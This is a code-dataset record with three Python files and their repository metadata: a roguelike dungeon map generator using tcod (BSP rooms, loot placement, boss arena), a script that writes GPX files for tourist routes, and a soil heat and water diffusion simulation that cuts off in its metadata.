self.tcod_empty_map = tcod.map.Map(self.width, self.height)
self.show_map = show_map
for x in range(self.width):
for y in range(self.height):
self.tcod_empty_map.transparent[y,x] = True
self.tcod_empty_map.walkable[y,x] = True
def get_sample(self):
"""
Used to color the walls and the floor
"""
ogrid = [np.arange(self.width, dtype=np.float32), np.arange(self.height, dtype=np.float32)]
noise = tcod.noise.Noise(
dimensions=2,
algorithm=tcod.NOISE_PERLIN,
implementation=tcod.noise.TURBULENCE,
hurst=0.9,
lacunarity=1.6,
octaves=5)
min_lum = 0.5
max_lum = 1
self.sample = noise.sample_ogrid(ogrid)*(max_lum-min_lum) + min_lum
def add_loot(self, turns, player, entities):
"""
Add loot to a new level
"""
n_slot = {}
for fslot in const.FeatureSlot:
# 2d4 features of each slot
n_slot[fslot] = sum([random.randint(1,4) for i in range(2)])
for wslot in const.WeaponSlot:
# 1d4 weapons of each slot
n_slot[wslot] = sum([random.randint(1,4) for i in range(1)])
for slot in n_slot:
n_generated = n_slot.get(slot)
for n in range(n_generated):
n_try = 50
while n_try > 0:
n_try -= 1
# loot is more probable in room with low arity
arity = random.choice([1,1,1,2,2,3,4,5])
rlist = [r for r in self.rooms_with_arity(arity) if r.n_loot < const.max_item_per_room]
if rlist:
room = random.choice(rlist)
(x,y) = self.random_cell_in_room(room)
if not self.tiles[x][y].item:
room.n_loot += 1
self.tiles[x][y].put_item(rloot.get_random_loot(slot, turns, player), entities)
break
def rooms_with_arity(self, max_arity):
"""
Return the list of room with at most max_arity neighbors
"""
return [r for r in self.room_list if len(r.neighbors) <= max_arity]
def make_boss_map(self, turns, entities, player):
"""
An arena
"""
self.get_sample()
self.tiles = [[entity.Tile(x,y,color_coeff=self.sample[x][y]) for y in range(self.height)] for x in range(self.width)]
self.tcod_map = tcod.map.Map(self.width, self.height)
center_x = self.width / 2
center_y = self.height / 2
a = 30
b = 15
self.room_list = [Room(int(center_x - a), int(center_y - b), 2*a, 2*b)]
for x in range(self.width):
for y in range(self.height):
if ((x - center_x)/a)**2 + ((y - center_y)/b)**2 <= 1: # ellipse equation
self.set_unblocked(x, y)
(player.x, player.y) = (int(center_x / 2), int(center_y))
boss = entity.Boss(int(center_x * 1.5), int(center_y))
entities.append(boss)
turns.add_turn(boss.speed_mov, const.TurnType.ENEMY, boss)
self.recompute_fov(player.x, player.y)
return boss
def make_map_bsp(self, turns, entities, player):
self.get_sample()
self.tiles = [[entity.Tile(x,y,color_coeff=self.sample[x][y]) for y in range(self.height)] for x in range(self.width)]
self.room_list = None
self.tcod_map = tcod.map.Map(self.width, self.height)
map_width = self.width
map_height = self.height
if self.show_map:
for x in range(map_width):
for y in range(map_height):
self.tiles[x][y].is_seen = True
# we garantee a wall on the north and the west
# this is necessary due to the generation the room
bsp = tcod.bsp.BSP(1,1,map_width-1, map_height-1)
bsp.split_recursive(6,6,6,1,1)
self.room_list = self.recursive_make_rooms(bsp)
# After the BSP generation, the dungeon is a tree
# Create some loops
rlist = self.rooms_with_arity(2)
for i in range(6):
for j in range(10):
c = random.choice(range(len(rlist)))
best = self.closest_rooms([rlist[c]], self.room_list)
if best:
astar = tcod.path.AStar(self.tcod_map)
score_tuple = None
best_tuple = []
for tuple_param in best:
(x1, y1, x2, y2, _, _) = tuple_param
path = astar.get_path(x1, y1, x2, y2)
tmp_score = int(len(path)/3)
if not score_tuple or tmp_score > score_tuple:
score_tuple = tmp_score
best_tuple = [tuple_param]
elif tmp_score == score_tuple:
best_tuple.append(tuple_param)
self.connect_rooms(random.choice(best_tuple))
del rlist[c]
break
# Initialization
(player.x, player.y) = self.random_cell()
(x, y) = self.random_cell()
self.place_stairs(x,y)
(x, y) = self.random_cell()
self.place_boss_stairs(x,y)
# self.place_boss_stairs(player.x,player.y) # DEBUG
self.add_loot(turns, player, entities)
self.recompute_fov(player.x, player.y)
def recompute_fov(self, x, y, light_walls=True, radius=0):
self.tcod_map.compute_fov(x, y, algorithm=2, radius=radius, light_walls=light_walls)
def is_visible(self, x, y):
return self.tcod_map.fov[y,x]
def spawn_boss(self, entities, fslot, level, player):
for i in range(50):
(x,y) = self.random_cell()
if not any([entity for entity in entities if entity.x == x and entity.y == y]):
if (fslot == const.FeatureSlot.i and level >= 3) or (fslot != const.FeatureSlot.i and level >= 2):
class_name = fslot.value.get("bug_class")
the_class = getattr(entity, class_name)
monster = the_class(x, y, level, player.fequiped.get(fslot), fslot)
else:
monster = entity.Monster(x, y, level, None, fslot)
entities.append(monster)
return monster
return None
def spawn(self, entities, feature):
# We try at most 50 times to spawn it
for i in range(50):
(x,y) = self.random_cell()
if not self.is_visible(x,y) and not any([entity for entity in entities if entity.x == x and entity.y == y]):
level = random.randint(1, 3)
if feature.n_bugs[level - 1] < const.n_bugs_max[feature.level - 1][level - 1]:
# mapgen bug are OP. Give their abitity to level 3 bug only
if (feature.fslot == const.FeatureSlot.i and level >= 3) or (feature.fslot != const.FeatureSlot.i and level >= 2):
class_name = feature.fslot.value.get("bug_class")
the_class = getattr(entity, class_name)
monster = the_class(x, y, level, feature)
else:
monster = entity.Monster(x, y, level, feature)
entities.append(monster)
return monster
return None
def iterator_perimeter_room(self, r):
for x in range(r.x, r.x + r.w):
yield (x, r.y)
yield (x, r.y + r.h - 1)
# y has a shorter range because the corners are already yielded
for y in range(r.y + 1, r.y + r.h - 1):
yield (r.x, y)
yield (r.x + r.w - 1, y)
def closest_rooms(self, l1, l2):
best = []
score_best = None
for r1 in l1:
for r2 in l2:
if r1 != r2 and r1 not in r2.neighbors:
for (x1, y1) in self.iterator_perimeter_room(r1):
for (x2, y2) in self.iterator_perimeter_room(r2):
dx = abs(x1-x2)
dy = abs(y1-y2)
# This is not a hack. It is… hand-crafted mapgen
# if dx >= 4 and dy >= 4:
# score = max(abs(x1-x2),abs(y1-y2)) # Chebyshev distance
# else:
score = abs(x1-x2) + abs(y1-y2) # Manhattan distance
if score_best == None or score < score_best:
score_best = score
best = [(x1,y1,x2,y2,r1,r2)]
elif score == score_best:
best.append((x1,y1,x2,y2,r1,r2))
return best
def random_cell(self):
return self.random_cell_in_room(random.choice(self.room_list))
def random_cell_in_room(self, r):
while True:
x = random.randrange(r.x, r.x + r.w)
y = random.randrange(r.y, r.y + r.h)
if self.is_floor(x,y):
return (x,y)
def recursive_make_rooms(self, bsp):
if not bsp.children:
w = random.randrange(max(3,int(bsp.w/3)),bsp.w-2)
h = random.randrange(max(3,int(bsp.h/3)),bsp.h-2)
upper_left_x = random.randrange(bsp.x, bsp.x + bsp.w - w)
upper_left_y = random.randrange(bsp.y, bsp.y + bsp.h - h)
for x in range(0,w):
for y in range(0,h):
self.set_unblocked(upper_left_x + x, upper_left_y + y)
# Sometimes, add a central pillar
if (w % 2) == 1 and (h % 2) == 1:
if random.randrange(0,10) == 0:
center_x = upper_left_x + int((w-1)/2)
center_y = upper_left_y + int((h-1)/2)
self.set_blocked(center_x, center_y)
# And rarely a big one (rare because big rooms aren't common)
if (w % 2) == 0 and (h % 2) == 0 and w >= 10 and h >= 10 and random.randrange(0,2) == 0:
center_x = upper_left_x + int(w/2) - 1
center_y = upper_left_y + int(h/2) - 1
for x in range(0,2):
for y in range(0,2):
self.set_blocked(center_x + x, center_y + y)
return [Room(upper_left_x, upper_left_y, w, h)]
else:
l1 = self.recursive_make_rooms(bsp.children[0])
l2 = self.recursive_make_rooms(bsp.children[1])
# it is garanteed to connect
self.connect_rooms(random.choice(self.closest_rooms(l1,l2)))
return l1+l2
def connect_rooms(self, tuple_param, force=False):
(x1, y1, x2, y2, r1, r2) = tuple_param
r1.neighbors.append(r2)
r2.neighbors.append(r1)
door_chance = 4
if x1 == x2:
if y1 > y2:
y1 -= 1
y2 += 1
else:
y1 += 1
y2 -= 1
self.create_v_tunnel(y1, y2, x1)
if random.randint(0,door_chance) == 0:
self.place_door(x1, y1)
elif random.randint(0,door_chance) == 0:
self.place_door(x2, y2)
elif y1 == y2:
if x1 > x2:
x1 -= 1
x2 += 1
else:
x1 += 1
x2 -= 1
self.create_h_tunnel(x1, x2, y1)
if random.randint(0,door_chance) == 0:
self.place_door(x1, y1)
elif random.randint(0,door_chance) == 0:
self.place_door(x2, y2)
# elif abs(x1-x2) < 3 or abs(y1-y2) < 3:
else:
if random.randint(0, 1) == 1:
if x1 > x2:
x1 -= 1
else:
x1 += 1
if y1 > y2:
y2 += 1
y3 = y1 - 1
else:
y2 -= 1
y3 = y1 + 1
self.create_h_tunnel(x1, x2, y1)
self.create_v_tunnel(y3, y2, x2)
if random.randint(0,door_chance) == 0 and abs(x1-x2) > 1:
self.place_door(x1, y1)
elif random.randint(0,door_chance) == 0 and abs(y1-y2) > 1:
self.place_door(x2, y2)
else:
if x1 > x2:
x2 += 1
x3 = x1 - 1
else:
x2 -= 1
x3 = x1 + 1
if y1 > y2:
y1 -= 1
else:
y1 += 1
self.create_v_tunnel(y1, y2, x1)
self.create_h_tunnel(x3, x2, y2)
if random.randint(0,door_chance) == 0 and abs(y1-y2) > 1:
self.place_door(x1, y1)
elif random.randint(0,door_chance) == 0 and abs(x1-x2) > 1:
self.place_door(x2, y2)
def create_h_tunnel(self, x1, x2, y):
for x in range(min(x1, x2), max(x1, x2) + 1):
self.set_unblocked(x,y)
def create_v_tunnel(self, y1, y2, x):
for y in range(min(y1, y2), max(y1, y2) + 1):
self.set_unblocked(x,y)
def get_copy_map(self):
return copy.deepcopy(self.tcod_map)
def get_copy_empty_map(self):
return copy.deepcopy(self.tcod_empty_map)
def set_tile_type(self, x, y, ttype):
self.tiles[x][y] = entity.Tile(x, y, color_coeff=self.sample[x][y], ttype=ttype)
if self.show_map:
self.tiles[x][y].is_seen = True
self.tcod_map.transparent[y,x] = ttype.value.get("transparent")
self.tcod_map.walkable[y,x] = not ttype.value.get("collision")
def is_over_map(self, x, y):
return x >= 0 and y >= 0 and x < self.width and y < self.height
def set_blocked(self, x, y):
self.set_tile_type(x, y, const.TileType.WALL)
def set_unblocked(self, x, y):
self.set_tile_type(x, y, const.TileType.FLOOR)
def place_door(self, x, y):
self.set_tile_type(x, y, const.TileType.DOOR)
def place_stairs(self, x, y):
self.set_tile_type(x, y, const.TileType.STAIRS)
def place_boss_stairs(self, x, y):
self.set_tile_type(x, y, const.TileType.BOSS_STAIRS)
def is_floor(self, x, y):
return self.tiles[x][y].ftype == const.TileType.FLOOR
def is_door(self, x, y):
return self.tiles[x][y].ftype == const.TileType.DOOR
def is_stairs(self, x, y):
return self.tiles[x][y].ftype == const.TileType.STAIRS
def is_boss_stairs(self, x, y):
return self.tiles[x][y].ftype == const.TileType.BOSS_STAIRS
def is_blocked(self, x, y):
return not self.tcod_map.walkable[y,x]
def drop_item_on_floor(self, player, entities, item, drop_key):
if not self.tiles[player.x][player.y].item:
player.remove_from_inventory(item, drop_key)
return self.tiles[player.x][player.y].put_item(item, entities)
def is_weapon_on_floor_directly_equipable(self, player):
item = self.tiles[player.x][player.y].item
if item and isinstance(item, entity.Weapon) and not player.wequiped.get(item.wslot):
return True
return False
def get_item_on_floor(self, player, entities):
if self.tiles[player.x][player.y].item:
item = self.tiles[player.x][player.y].take_item(entities)
key = player.add_to_inventory(item)
return (item,key)
def description_item_on_floor(self, player):
"""
Get the name of the item on the floor where the player is
"""
if self.tiles[player.x][player.y].item:
return self.tiles[player.x][player.y].item.name
return None
def is_there_item_on_floor(self, player):
"""
Is there an item on the floor, where the player is?
"""
return self.tiles[player.x][player.y].item != None
|
cpiod/1rl
|
game_map.py
|
game_map.py
|
py
| 16,741 |
python
|
en
|
code
| 3 |
github-code
|
6
|
[
{
"api_name": "tcod.map.Map",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "tcod.map",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "numpy.arange",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name": "tcod.noise.Noise",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "tcod.noise",
"line_number": 41,
"usage_type": "attribute"
},
{
"api_name": "tcod.NOISE_PERLIN",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "tcod.noise",
"line_number": 44,
"usage_type": "attribute"
},
{
"api_name": "constants.FeatureSlot",
"line_number": 57,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "constants.WeaponSlot",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "random.choice",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "constants.max_item_per_room",
"line_number": 72,
"usage_type": "attribute"
},
{
"api_name": "random.choice",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "random_loot.get_random_loot",
"line_number": 78,
"usage_type": "call"
},
{
"api_name": "entity.Tile",
"line_number": 92,
"usage_type": "call"
},
{
"api_name": "tcod.map.Map",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "tcod.map",
"line_number": 93,
"usage_type": "attribute"
},
{
"api_name": "entity.Boss",
"line_number": 104,
"usage_type": "call"
},
{
"api_name": "constants.TurnType",
"line_number": 106,
"usage_type": "attribute"
},
{
"api_name": "entity.Tile",
"line_number": 112,
"usage_type": "call"
},
{
"api_name": "tcod.map.Map",
"line_number": 114,
"usage_type": "call"
},
{
"api_name": "tcod.map",
"line_number": 114,
"usage_type": "attribute"
},
{
"api_name": "tcod.bsp.BSP",
"line_number": 123,
"usage_type": "call"
},
{
"api_name": "tcod.bsp",
"line_number": 123,
"usage_type": "attribute"
},
{
"api_name": "random.choice",
"line_number": 132,
"usage_type": "call"
},
{
"api_name": "tcod.path.AStar",
"line_number": 135,
"usage_type": "call"
},
{
"api_name": "tcod.path",
"line_number": 135,
"usage_type": "attribute"
},
{
"api_name": "random.choice",
"line_number": 147,
"usage_type": "call"
},
{
"api_name": "entity.x",
"line_number": 171,
"usage_type": "attribute"
},
{
"api_name": "entity.y",
"line_number": 171,
"usage_type": "attribute"
},
{
"api_name": "constants.FeatureSlot",
"line_number": 172,
"usage_type": "attribute"
},
{
"api_name": "entity.Monster",
"line_number": 177,
"usage_type": "call"
},
{
"api_name": "entity.x",
"line_number": 186,
"usage_type": "attribute"
},
{
"api_name": "entity.y",
"line_number": 186,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
"line_number": 187,
"usage_type": "call"
},
{
"api_name": "constants.n_bugs_max",
"line_number": 188,
"usage_type": "attribute"
},
{
"api_name": "constants.FeatureSlot",
"line_number": 190,
"usage_type": "attribute"
},
{
"api_name": "entity.Monster",
"line_number": 195,
"usage_type": "call"
},
{
"api_name": "random.choice",
"line_number": 233,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"line_number": 237,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"line_number": 238,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"line_number": 244,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"line_number": 245,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"line_number": 246,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"line_number": 247,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"line_number": 255,
"usage_type": "call"
},
{
"api_name": "random.randrange",
"line_number": 261,
"usage_type": "call"
},
{
"api_name": "random.choice",
"line_number": 274,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 290,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 292,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 302,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 304,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 308,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 322,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 324,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 341,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 343,
"usage_type": "call"
},
{
"api_name": "copy.deepcopy",
"line_number": 355,
"usage_type": "call"
},
{
"api_name": "copy.deepcopy",
"line_number": 358,
"usage_type": "call"
},
{
"api_name": "entity.Tile",
"line_number": 361,
"usage_type": "call"
},
{
"api_name": "constants.TileType",
"line_number": 371,
"usage_type": "attribute"
},
{
"api_name": "constants.TileType",
"line_number": 374,
"usage_type": "attribute"
},
{
"api_name": "constants.TileType",
"line_number": 377,
"usage_type": "attribute"
},
{
"api_name": "constants.TileType",
"line_number": 380,
"usage_type": "attribute"
},
{
"api_name": "constants.TileType",
"line_number": 383,
"usage_type": "attribute"
},
{
"api_name": "constants.TileType",
"line_number": 386,
"usage_type": "attribute"
},
{
"api_name": "constants.TileType",
"line_number": 389,
"usage_type": "attribute"
},
{
"api_name": "constants.TileType",
"line_number": 392,
"usage_type": "attribute"
},
{
"api_name": "constants.TileType",
"line_number": 395,
"usage_type": "attribute"
},
{
"api_name": "entity.Weapon",
"line_number": 407,
"usage_type": "attribute"
}
] |
9512772188
|
import sys
import pandas as pd
import numpy as np
import xml.dom.minidom
#from exercise 3
def output_gpx(points, output_filename):
"""
Output a GPX file with latitude and longitude from the points DataFrame.
"""
def append_trkpt(pt, trkseg, doc):
trkpt = doc.createElement('trkpt')
trkpt.setAttribute('lat', '%.8f' % (pt['lat']))
trkpt.setAttribute('lon', '%.8f' % (pt['lon']))
trkseg.appendChild(trkpt)
doc = xml.dom.minidom.getDOMImplementation().createDocument(None, 'gpx', None)
trk = doc.createElement('trk')
doc.documentElement.appendChild(trk)
trkseg = doc.createElement('trkseg')
trk.appendChild(trkseg)
points.apply(append_trkpt, axis=1, trkseg=trkseg, doc=doc)
with open(output_filename, 'w') as fh:
doc.writexml(fh, indent=' ')
def main(input_file):
culture_tour = pd.read_csv('culture_tour.csv')
dessert_tour = pd.read_csv('dessert_tour.csv')
pub_crawl = pd.read_csv('pub_crawl.csv')
scenic_tour = pd.read_csv('scenic_tour.csv')
lodging_df = pd.read_csv(input_file)
lodging_coordinates_df = lodging_df[['lat', 'lon']]
output_gpx(lodging_coordinates_df, 'lodging.gpx')
culture_interest = lodging_df['culture'].values[0]
dessert_interest = lodging_df['dessert'].values[0]
drinks_interest = lodging_df['drinks'].values[0]
scenic_interest = lodging_df['scenic'].values[0]
if (culture_interest == 'y'):
culture_tour_subset_df = culture_tour[['lat', 'lon']]
culture_tour_subset_df = culture_tour_subset_df.append(culture_tour_subset_df.iloc[0])
output_gpx(culture_tour_subset_df, 'culture.gpx')
if (dessert_interest == 'y'):
dessert_tour_subset_df = dessert_tour[['lat', 'lon']]
dessert_tour_subset_df = dessert_tour_subset_df.append(dessert_tour_subset_df.iloc[0])
output_gpx(dessert_tour_subset_df, 'desserts.gpx')
if (drinks_interest == 'y'):
pub_crawl_subset_df = pub_crawl[['lat', 'lon']]
pub_crawl_subset_df = pub_crawl_subset_df.append(pub_crawl_subset_df.iloc[0])
output_gpx(pub_crawl_subset_df, 'drinks.gpx')
if (scenic_interest == 'y'):
scenic_tour_subset_df = scenic_tour[['lat', 'lon']]
scenic_tour_subset_df = scenic_tour_subset_df.append(scenic_tour_subset_df.iloc[0])
output_gpx(scenic_tour_subset_df, 'scenic.gpx')
if __name__ == '__main__':
input_file = sys.argv[1]
main(input_file)
|
tomchiu19/tourPlanner
|
code/05-generate-gpx.py
|
05-generate-gpx.py
|
py
| 2,464 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "xml.dom.minidom.dom.minidom.getDOMImplementation",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "xml.dom.minidom.dom",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "xml.dom.minidom",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "pandas.read_csv",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 62,
"usage_type": "attribute"
}
] |
41054313506
|
# coding: utf-8
# # Heat Diffusion in Soils
#
# This Jupyter Notebook gives an example how to implement a 1D heat diffusion model in Python.
#
# First we need to import the packages which we will be using:
#
# In[1]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import CoupledHeatWaterFlowTHe as cfun
import MyTicToc as mt
sns.set()
## Main
# In[0:] Domain & Soil properties
nIN = 51
# soil profile until 15 meters depth
zIN = np.linspace(-2.0, 0, num=nIN).reshape(nIN, 1)
# nIN = np.shape(zIN)[0]
zN = np.zeros(nIN - 1).reshape(nIN - 1, 1)
zN[0, 0] = zIN[0, 0]
zN[1:nIN - 2, 0] = (zIN[1:nIN - 2, 0] + zIN[2:nIN - 1, 0]) / 2
zN[nIN - 2, 0] = zIN[nIN - 1]
nN = np.shape(zN)[0]
ii = np.arange(0, nN - 1)
dzN = (zN[ii + 1, 0] - zN[ii, 0]).reshape(nN - 1, 1)
dzIN = (zIN[1:, 0] - zIN[0:-1, 0]).reshape(nIN - 1, 1)
# collect model dimensions in a pandas series: mDim
mDim = {'zN' : zN,
'zIN' : zIN,
'dzN' : dzN,
'dzIN' : dzIN,
'nN' : nN,
'nIN' : nIN
}
mDim = pd.Series(mDim)
# ## Definition of material properties
# In this section of the code we define the material properties
# Soil Properties
# [J/(m3 K)] volumetric heat capacity of soil solids
zetaSol = 2.235e6
# [J/(m3 K)] volumetric heat capacity of water (Fredlund 2006)
zetaWat = 4.154e6
# rhoW = 1000 # [kg/m3] density of water
rhoS = 2650 # [kg/m3] density of solid phase
rhoB = 1700 # %[kg/m3] dry bulk density of soil
n = 1 - rhoB / rhoS # [-] porosity of soil = saturated water content.
qCont = 0.75 # quartz content
# collect soil parameters in a pandas Series: sPar
sPar = {'vGA': np.ones(np.shape(zN)) * 1 / 2.0, # alpha[1/m]
'vGN': np.ones(np.shape(zN)) * 2.0, # n[-]
'vGM': np.ones(np.shape(zN)) * (1 - 1 / 2.0), # m = 1-1/n[-]
'thS': np.ones(np.shape(zN)) * 0.4, # saturated water content
'thR': np.ones(np.shape(zN)) * 0.03, # residual water content
'KSat': np.ones(np.shape(zN)) * 0.25, # [m/day]
'vGE': 0.5, # power factor for Mualem-van Genuchten
'Cv': 1.0e-8, # compressibility of compact sand [1/Pa]
'viscRef': cfun.ViscosityWaterT(283.15),
'qCont': qCont, # quartz content
}
sPar = pd.Series(sPar)
# In[1:] Definition of the Boundary Parameters
# Read meteodata
meteo_data = pd.read_excel('WieringermeerData_Meteo.xlsx')
meteo_data['num_date'] = meteo_data['datetime'].astype(np.int64)/(1e9*3600*24)
meteo_data.set_index('datetime',inplace=True)
# set simulation time to numeric dates from boudary data...
t_range = meteo_data['num_date'][:-1]
taxis = meteo_data.index[:-1]
# collect boundary parameters in a named tuple boundpar...
def BndTTop(t, bPar):
if np.size(t)==1:
t = np.array([t])
bndT = np.zeros(len(t))
for ii in range(len(t)):
xy, md_ind, t_ind = np.intersect1d(bPar.meteo_data['num_date'], np.ceil(t[ii]), return_indices=True)
topT = bPar.meteo_data['temp'].iloc[md_ind].values
bndT[ii] = 273.15 + topT
return bndT
def BndqWatTop(t, bPar):
if np.size(t)==1:
t = np.array([t])
qBnd = np.zeros(len(t))
for ii in range(len(t)):
xy, md_ind, t_ind = np.intersect1d(bPar.meteo_data['num_date'], np.ceil(t[ii]), return_indices=True)
rf = bPar.meteo_data['rain_station'].iloc[md_ind].values
qBnd[ii] = -rf
return qBnd
bPar = {'topBndFuncHeat': BndTTop,
'meteo_data': meteo_data,
'topCond': 'Robin',
'lambdaRobTop': 1e9,
'lambdaRobBot': 0,
'TBndBot': 273.15 + 10,
'topBndFuncWat': BndqWatTop, #topBndFuncWat(t,bPar)
'bottomTypeWat': 'Robin', # Robin condition or Gravity condition
'kRobBotWat': 0.05, # Robin resistance term for bottom
'hwBotBnd': 1.0, # pressure head at lower boundary
}
bPar = pd.Series(bPar)
# In[3:] Define Initial Conditions
zRef = -1.0 # depth of water table
hwIni = zRef - zN
TIni = np.ones(np.shape(zN)) * (10.0 + 273.15) # K
sVecIni = np.concatenate([hwIni, TIni], axis=0)
# Time Discretization
tOut = np.linspace(t_range[0],t_range[365],365*5)
#tplot = taxis[0:50]
nOut = np.shape(tOut)[0]
nOut = len(tOut)
# tOut = np.sort(np.hstack((tOut1, bTime))) # time
# copy initial vector to hw0. Apply squeeze to compress it to one dimension
mt.tic()
int_result = cfun.IntegrateCHWF(tOut, sVecIni, sPar, mDim, bPar)
mt.toc()
hWSim = int_result.y[0:nN]
TSim = int_result.y[nN:2*nN]
thSim = cfun.thFun(hWSim,sPar)
qWSim = cfun.WatFlux(tOut,hWSim,TSim,sPar,mDim,bPar)
qHSim = cfun.HeatFlux(tOut, TSim, hWSim, sPar, mDim, bPar)
#mt.tic()
#TOutPic, hwOutPic = himp.HalfImplicitPicar(tOut2, hw0, T0, sPar, mDim, bPar, tPar)
#mt.toc()
sns.set()
plt.close('all')
fig1, ax1 = plt.subplots(figsize=(7, 4))
ii = np.arange(nN-1, 0, -10)
ax1.plot(tOut, TSim[ii,].T, '-')
ax1.set_title('Temperature (ODE)')
ax1.set_xlabel('time (days)')
ax1.set_ylabel('temperature [K]')
ax1.legend(zN[ii])
fig2, ax2 = plt.subplots(figsize=(7, 7))
jj = np.arange(0, nOut)
ax2.plot(TSim[:, jj], zN, '-')
ax2.set_title('Temperature vs. depth (ODE)')
ax2.set_ylabel('depth [m]')
ax2.set_xlabel('temperature [K]')
fig3, ax3 = plt.subplots(figsize=(7, 4))
# plot fluxes after 2nd output time (initial rate is extreme due to initial conditions)
ax3.plot(tOut, qHSim[ii,:].T, '-')
ax3.set_title('Heat Flux vs. depth (ODE)')
ax3.set_ylabel('depth [m]')
ax3.set_xlabel('temperature [J/m2]')
ax3.legend(zN[ii])
fig4, ax4 = plt.subplots(figsize=(7, 4))
# plot the pressure head for different depths as a function of time
# in this case we plot every 20th layer.
ax4.plot(tOut, hWSim[ii,:].T, '-')
ax4.set_ylabel('pressure head [m]')
ax4.set_xlabel('time [d]')
#plot pressure head as a function of depth. Here we plot every time step
fig5, ax5 = plt.subplots(figsize=(7, 7))
ax5.plot(hWSim, zN, '-')
ax5.grid(b=True)
ax5.set_xlabel('pressure head [m]')
ax5.set_ylabel('depth [m]')
# plt.savefig('myfig.png')
fig6, ax6 = plt.subplots(figsize=(7, 7))
ax6.plot(thSim, zN, '-')
ax6.grid(b=True)
ax6.set_xlabel('water content [-]')
ax6.set_ylabel('depth [m]')
fig7, ax7 = plt.subplots(figsize=(7, 4))
# plot the pressure head for different depths as a function of time
# in this case we plot every 20th layer.
ax7.plot(tOut, thSim[ii,:].T, '-')
ax7.set_ylabel('water content [-]')
ax7.set_xlabel('time [d]')
ax7.legend(zN[ii])
fig8, ax8 = plt.subplots(figsize=(7, 4))
# plot fluxes after 2nd output time (initial rate is extreme due to initial conditions)
ax8.plot(tOut, qWSim[ii,:].T, '-')
ax8.set_title('Water Flux ')
ax8.set_ylabel('depth [m]')
ax8.set_xlabel('water flow [m/d]')
ax8.legend(zN[ii])
fig1.savefig('./figures_scenarios/3_figure1.png')
fig2.savefig('./figures_scenarios/3_figure2.png')
fig3.savefig('./figures_scenarios/3_figure3.png')
fig4.savefig('./figures_scenarios/3_figure4.png')
fig5.savefig('./figures_scenarios/3_figure5.png')
fig6.savefig('./figures_scenarios/3_figure6.png')
fig7.savefig('./figures_scenarios/3_figure7.png')
fig8.savefig('./figures_scenarios/3_figure8.png')
# import shelve
# filename='/tmp/shelve.out'
# my_shelf = shelve.open(filename,'n') # 'n' for new
# for key in dir():
# try:
# my_shelf[key] = globals()[key]
# except TypeError:
# #
# # __builtins__, my_shelf, and imported modules can not be shelved.
# #
# print('ERROR shelving: {0}'.format(key))
# my_shelf.close()
|
solomelittle/EL-Individual-Assignment
|
03_ScriptCH_WieringermeerBoundary.py
|
03_ScriptCH_WieringermeerBoundary.py
|
py
| 7,445 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "seaborn.set",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "pandas.Series",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "CoupledHeatWaterFlowTHe.ViscosityWaterT",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "pandas.Series",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "pandas.read_excel",
